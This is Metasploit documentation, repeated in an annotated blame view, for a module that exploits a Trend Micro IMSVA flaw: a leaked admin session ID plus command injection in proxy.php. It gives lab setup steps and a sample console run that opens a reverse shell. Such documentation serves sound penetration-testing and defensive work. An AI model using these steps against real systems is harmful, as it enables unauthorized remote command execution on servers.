documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md

## Vulnerable Application
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.

The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.

**Vulnerable Application Installation Steps**

IMSVA is distrubed as an ISO image by Trend Micro.

Following steps are valid on the CentOS 6 x64 bit operating system.

1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
2. Find "InterScan Messaging Security (Virtual Appliance)" and click.
3. At the time of writing this documentation, you must see "IMSVA-9.1-1600-x86-64-r2.iso" next to Download button.
4. Click to the download button and complete installation of ISO.

If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-1600 directly from following URL.

[http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso](http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso)

**System requirements:**
- Virtualbox or VMware can be used. 
- 4 GB of memory at least.
- 120 GB of disk size at least.

## Verification Steps

A successful check of the exploit will look like this:

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/trendmicro_imsva_widget_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `Awesome. JSESSIONID value` in console.
- [ ] **Verify** that you are getting `Session with widget framework successfully initiated` session.

## Scenarios

```
msf > use exploit/linux/http/trendmicro_imsva_widget_exec
msf exploit(trendmicro_imsva_widget_exec) > set RHOST 12.0.0.201
RHOST => 12.0.0.184
msf exploit(trendmicro_imsva_widget_exec) > check
[*] 12.0.0.184:443 The target appears to be vulnerable.
msf exploit(trendmicro_imsva_widget_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Trigerring command injection vulnerability
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300

pwd
/opt/trend/imss/UI/adminUI/ROOT/widget

```
Adding Trend Micro IMSVA Widget RCE 2017-10-08 18:15:32 +03:00			`## Vulnerable Application`
			`This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.`

			The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.

			`Vulnerable Application Installation Steps`

			`IMSVA is distrubed as an ISO image by Trend Micro.`

			`Following steps are valid on the CentOS 6 x64 bit operating system.`

			`1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)`
			`2. Find "InterScan Messaging Security (Virtual Appliance)" and click.`
			`3. At the time of writing this documentation, you must see "IMSVA-9.1-1600-x86-64-r2.iso" next to Download button.`
			`4. Click to the download button and complete installation of ISO.`

			`If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-1600 directly from following URL.`

			`[http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso](http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso)`

			`System requirements:`
			`- Virtualbox or VMware can be used.`
			`- 4 GB of memory at least.`
			`- 120 GB of disk size at least.`

			`## Verification Steps`

			`A successful check of the exploit will look like this:`

			- [ ] Start `msfconsole`
Fixing grammer issue 2017-10-09 22:31:13 +03:00			- [ ] `use exploit/linux/http/trendmicro_imsva_widget_exec`
Adding Trend Micro IMSVA Widget RCE 2017-10-08 18:15:32 +03:00			- [ ] Set `RHOST`
			- [ ] Set `LHOST`
			- [ ] Run `check`
			- [ ] Verify that you are seeing `The target appears to be vulnerable.`
			- [ ] Run `exploit`
			- [ ] Verify that you are seeing `Awesome. JSESSIONID value` in console.
			- [ ] Verify that you are getting `Session with widget framework successfully initiated` session.

			`## Scenarios`

			```
Fixing grammer issue 2017-10-09 22:31:13 +03:00			`msf > use exploit/linux/http/trendmicro_imsva_widget_exec`
			`msf exploit(trendmicro_imsva_widget_exec) > set RHOST 12.0.0.201`
Adding Trend Micro IMSVA Widget RCE 2017-10-08 18:15:32 +03:00			`RHOST => 12.0.0.184`
Fixing grammer issue 2017-10-09 22:31:13 +03:00			`msf exploit(trendmicro_imsva_widget_exec) > check`
Adding Trend Micro IMSVA Widget RCE 2017-10-08 18:15:32 +03:00			`[*] 12.0.0.184:443 The target appears to be vulnerable.`
Fixing grammer issue 2017-10-09 22:31:13 +03:00			`msf exploit(trendmicro_imsva_widget_exec) > exploit`
Adding Trend Micro IMSVA Widget RCE 2017-10-08 18:15:32 +03:00
			`[*] Started reverse TCP handler on 12.0.0.1:4444`
			`[*] Extracting JSESSIONID from publicly accessible log file`
			`[+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E`
			`[*] Initiating session with widget framework`
			`[+] Session with widget framework successfully initiated.`
			`[*] Trigerring command injection vulnerability`
			`[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300`

			`pwd`
			`/opt/trend/imss/UI/adminUI/ROOT/widget`

			```